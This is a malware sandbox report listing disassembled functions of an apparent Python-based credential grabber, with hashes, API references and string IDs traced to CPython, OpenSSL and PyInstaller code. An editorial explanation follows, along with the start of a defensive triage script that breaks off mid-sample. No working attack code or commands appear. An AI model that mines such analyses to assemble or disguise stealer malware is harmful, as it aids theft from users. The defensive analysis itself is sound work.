• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: 00007ErrorF906013440Last
• String ID: NOO$surrogatepass$unsupported address family
• API String ID: 3485956551-472101058
• Opcode ID: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
• Instruction ID: 643dddd20b66920805b14124c9f20cc2ccbdd0a344b5e7baad2f5bdd81823957
• Opcode Fuzzy Hash: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
• Instruction Fuzzy Hash: BD81BD22E08B9281EA518BA5E5403BE73A0FF59BD0F064135DE4E437A4EF3DE484C70A
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
• Instruction ID: aa46445dc62515560b75628329d928c87d25a4fdc03928228d9be78db9822ea6
• Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
• Instruction Fuzzy Hash: 59B1B432B1869241FA61EB2195043B9E3A1EB95BE4F849173EA5D07B9DEE3CE441C331
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID: 00007F9060208
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
• API String ID: 3464486852-3130753023
• Opcode ID: 61b467f36872fde71698c80f3b57ac3c6faba2ba744cb4768d1c2235e01b7059
• Instruction ID: d7b94f398e579b8384c67afcaba4ccece4eca849c8f0c4c98233d2934fff13c8
• Opcode Fuzzy Hash: 61b467f36872fde71698c80f3b57ac3c6faba2ba744cb4768d1c2235e01b7059
• Instruction Fuzzy Hash: 7A12D262B0CA8281FB149BA5E4467BEA795FF817C4F404032EE6D47B9ADF7CE5418702
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
• Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
Similarity
• API ID: 00007
• String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context$Python
• API String ID: 3568877910-1888807747
• Opcode ID: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
• Instruction ID: dce0bd8f1933e4e2116dd78d44b20ef01ffc490bc8d8d763985a4fea84b3de59
• Opcode Fuzzy Hash: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
• Instruction Fuzzy Hash: 37A14A36A0CA5286EEA09FA6A85562D7361FF85BD0F148435DE4E07BE0DF3CE445870A
APIs
• _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
  • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
• _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
  • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
• _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
  • Part of subcall function 00007FF7EAD255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255DC
  • Part of subcall function 00007FF7EAD1A948: HeapFree.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
  • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction ID: bf490f140bd8aad831dba4d5576fa1d25809c9971226ccdb52ff4440ccbece9c
• Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction Fuzzy Hash: 72517F32A0864286F710FF25D9816A9E761FB88784FC041B7EA4D876A9EF3CE441C771
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID: 00007F9060208
• String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
• API String ID: 3464486852-446233508
• Opcode ID: 6f1e473bb4d7c6af8c0df0e29d063f6f90a189f454450d160f75b595daedfc77
• Instruction ID: 9980b957c3c5f89ef1394b8c1d43689299db9f8214a8792378a7be1de799e1df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1e473bb4d7c6af8c0df0e29d063f6f90a189f454450d160f75b595daedfc77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED10061B0D6C381FB54EBA2E5527BE2291EF85BC4F550031EE2D4BB86CF2DE5518B02
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: listen
• String ID: |i:listen
• API String ID: 3257165821-1087349693
• Opcode ID: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
• Instruction ID: 907397184f89c31e2aa6326d59105fac0b967d248228e3fb1d326fc39c0afe98
• Opcode Fuzzy Hash: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
• Instruction Fuzzy Hash: B9014C21B28A4283FB448FA2E98426E6371FF89BD0F154031DA4E43B58DF3CE455C705
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e01617633d62c7c04581d9db99b67ae7cf5d116ed409b32e1f2b517a31030fcb
• Instruction ID: 7401c2ccebd71d26920eff96f626991c1986ea97818037b19c6067321994f069
• Opcode Fuzzy Hash: e01617633d62c7c04581d9db99b67ae7cf5d116ed409b32e1f2b517a31030fcb
• Instruction Fuzzy Hash: A8B0924324E2C10BC302C7B4482444D2FA08583A4076C408F838683283C00C48488302
APIs
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05840
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05852
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05889
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0589B
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058B4
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058C6
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058DF
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058F1
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0590D
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0591F
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0593B
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0594D
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05969
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0597B
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05997
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059A9
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059C5
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059D7
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction ID: 838a6403920f793cf825e78015ef6722e1d388e4f4ef0c52e758ecde8d02b0c6
• Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction Fuzzy Hash: FE22D274A09B0781FA05FB11A8507B4A7A5EF05749FD490F7E81E02268FFBCB948C272
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction ID: fd79366d10eff1426a2f1099dc66648e36f79815a7641e88e24ed06158b605d5
• Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction Fuzzy Hash: 7002C130E09F0781FA55FB55A9547B4A3A6EF05758BD040B3E86E0626CEF7CB54AC232
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: htons
• String ID: %s(): AF_HYPERV address must be tuple, not %.500s$%s(): AF_HYPERV address service_id is not a valid UUID string$%s(): AF_HYPERV address vm_id is not a valid UUID string$%s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): unsupported AF_HYPERV protocol: %d$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])$UU;AF_HYPERV address must be a str tuple (vm_id, service_id)
• API String ID: 4207154920-3631354148
• Opcode ID: 65c7fb5e1b5cb7743f2b7115a2606a9b17d437ac19ebb2a548de934386b24315
• Instruction ID: 30db04cd5f8bf161300ce63feeb4a2bf22c0e5a337e1a7d78c931bde45c6727b
• Opcode Fuzzy Hash: 65c7fb5e1b5cb7743f2b7115a2606a9b17d437ac19ebb2a548de934386b24315
• Instruction Fuzzy Hash: 6EC12C72A08B4286EB10CFA5E9803BC37A0FB55BC8F164136DA4E53664DF3CE495C34A
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: AddrFreeInfo$getaddrinfoinet_pton
• String ID: 255.255.255.255$<broadcast>$address family mismatched$unknown address family$unsupported address family$wildcard resolved to multiple address
• API String ID: 3456548859-1715193308
• Opcode ID: e38dd31c2c705093840054c3f6f1944b26c7efcdfc5ee6327c49719d0f116eec
• Instruction ID: 35944bcb01d7e64c3db377752b6c21fca452807256a89414ecb3b84468681d83
• Opcode Fuzzy Hash: e38dd31c2c705093840054c3f6f1944b26c7efcdfc5ee6327c49719d0f116eec
• Instruction Fuzzy Hash: 1A719261A08742C2F7208FA5A4043BD63A0FB85FC4F524231EE5E536A5DF3CE555C74A
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
• String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$getnameinfo() argument 1 must be a tuple$getnameinfo(): flowinfo must be 0-1048575.$si|II;getnameinfo(): illegal sockaddr argument$sockaddr resolved to multiple addresses$socket.getnameinfo$surrogatepass
• API String ID: 4001298222-243639936
• Opcode ID: 8c926511a33a684e4fd5c2fa0c2c9a11c5c77bdf7478a1f8c49009de7e57055e
• Instruction ID: e3264321d8b27136144f73d08c3e09a34721b94da3db0e2c821c2067cf323d70
• Opcode Fuzzy Hash: 8c926511a33a684e4fd5c2fa0c2c9a11c5c77bdf7478a1f8c49009de7e57055e
• Instruction Fuzzy Hash: AB813B72A08B4686EB10CFA1E4403AD73A0FB89BD4F520136DA4D47A68DF7CE585CB45
APIs
  • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF7EAD086B7,?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0822C
  • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction ID: 27cbb44b4b0018f4524e81f297e685114d20aa569ed7601946d0285ee283ed2a
• Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction Fuzzy Hash: B2518311A2964245FA50FB24D8913BEE391EF94788FC44473DA4E826DDEEBCE404C772
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 5687553188da95979e1850d39e0540597c2748fb5fd92a7858fdb41ee8a10d46
• Instruction ID: 268be9953173299050babd1cc5b9ac8576ec22708eb0e55688078a03abb146f7
• Opcode Fuzzy Hash: 5687553188da95979e1850d39e0540597c2748fb5fd92a7858fdb41ee8a10d46
• Instruction Fuzzy Hash: D851AE61A0864792FA10FB6194803B9E3A2FF84798FC445B3EE4C4779ADE3CE545C362
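The entries above all come from code the sample ships with rather than from the stealer's own logic: the Tcl_*/Tk_* names and the socket.getnameinfo / AF_INET messages are error strings of CPython's _tkinter and _socket extension modules (the module dumped at 00007FF8E8130000), and the "LOADER: ... runtime-tmpdir" and "Failed to extract %s" messages are PyInstaller bootloader strings (the module dumped at 00007FF7EAD00000), which is how this Python-based grabber is packaged. A listing of this length is far quicker to work through if those modules are tagged first. The script below is an added example written for this page, not Joe Sandbox tooling: it parses entries in the layout used here (one "• Key: value" line per field, "$" as the String ID separator, "• Instruction Fuzzy Hash" closing each function), groups functions by the module base given in the Source File line, and tags modules whose strings match runtime components. The RUNTIME_MARKERS table is the editor's own mapping, the sample is constructed from trimmed copies of the entries shown (hashes shortened), and the third module's strings in the sample are placeholders, since the page shows none for that module. It does not reproduce Joe Sandbox's Opcode or Instruction fuzzy-hash algorithms, which the report does not describe.

```python
"""Triage the per-function entries of a Joe Sandbox disassembly listing: parse
them, group functions by source module, tag modules that are known runtime code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample in the listing's own layout (hashes shortened; three functions
# from three modules; the third module's strings are placeholders, not from the report).
SAMPLE = """\
APIs
Strings
Memory Dump Source
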